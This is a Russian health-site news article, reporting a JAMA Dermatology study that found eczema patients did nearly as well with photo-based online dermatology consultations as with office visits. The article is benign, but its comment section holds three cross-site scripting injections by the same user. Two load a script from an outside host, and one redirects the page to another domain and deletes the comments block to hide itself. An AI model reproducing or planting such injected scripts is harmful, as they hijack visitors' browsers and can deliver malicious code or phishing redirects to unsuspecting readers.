Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Селфи может заменить похо...  >>  Селфи может заменить поход к врачу
 
Обратная связь
 

Селфи может заменить поход к врачу

Размер шрифта
03 июня 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Современные технологии смогли прочно занять свое место в медицине, и благодаря им вам теперь вовсе не обязательно регулярно ходить на прием к врачу. Достаточно лишь сделать фото своей кожи и отослать его дерматологу, и он сможет назначить вам подходящее лечение.

Селфи может заменить поход к врачу

«Наше исследование выявило интересный факт: состояние пациентов, страдающих экземой, улучшалось независимо от того, приходили ли они к врачу на прием или общались с ним по интернету», – рассказывает доктор Гэри Голденберг, профессор дерматологии из больницы Маунт Синай в Нью-Йорке. «Новые технологии дают пациентам дополнительные возможности для общения со своим врачом», – добавляет доктор Голденберг. Исследование возглавил доктор Эйприл Армстронг из Университета Колорадо, а его результаты были опубликованы в журнале JAMA Dermatology.

В исследовании приняли участие 156 пациентов с экземой. 78 из них наблюдались у дерматолога лично, а другие 78 пациентов получали консультации по интернету. Пациенты из группы онлайн-консультаций посылали своему врачу фотографии кожных проявлений экземы. Врач оценивал эти фотографии, давал свои рекомендации по лечению и выписывал необходимые препараты.

Через год у 44% пациентов из первой группы наблюдалось полное или практически полное исчезновение проявлений заболевания. В группе онлайн-консультаций этот процент был лишь немногим меньше: у 38% пациентов было зафиксировано значительное улучшение состояния. Эти результаты говорят о том, что онлайн-консультации дерматологов могут улучшить процесс оказания помощи пациентам в тех ситуациях, когда у врачей не хватает времени для приема всех больных. «Такие консультации особенно важны для пациентов, которые живут в сельской местности и которым трудно добираться до врача», – считает Голденберг.

Однако доктор Дорис Дэй, дерматолог из больницы Ленокс Хилл в Нью Йорке, отмечает, что прием у врача все же играет очень важную роль в лечении. «Атопический дерматит, как и многие другие хронические заболевания, достаточно сильно влияет на эмоциональное состояние пациентов», – объясняет она. «Поэтому личное посещение врача очень важно для формирования доверительных отношений между врачом и пациентом. При личной встрече врач может заметить у больного признаки депрессии и помочь ему справиться с этим состоянием, а также проконтролировать выполнение пациентом всех рекомендаций».

И хотя онлайн-консультации ни в коем случае не отменяют необходимости посещений врача, они могут стать отличным дополнением к процессу лечения и позволят вам сэкономить время и силы.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:18

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:18

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:05

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Проблемы с красотой после 40, о которых никто вам не рассказывал   Могут ли микробы заменить душ?   Отдыхаете на пляже, выпиваете? Вот что алкоголь делает с кожей на солнце   Бегом на улицу! Солнце понижает давление!  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Что делать с сухой кожей
Как не покрыться прыщами
Обычные предметы вызывают прыщи у взрослых!

Тесты

1
Как устроены волосы человека?
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.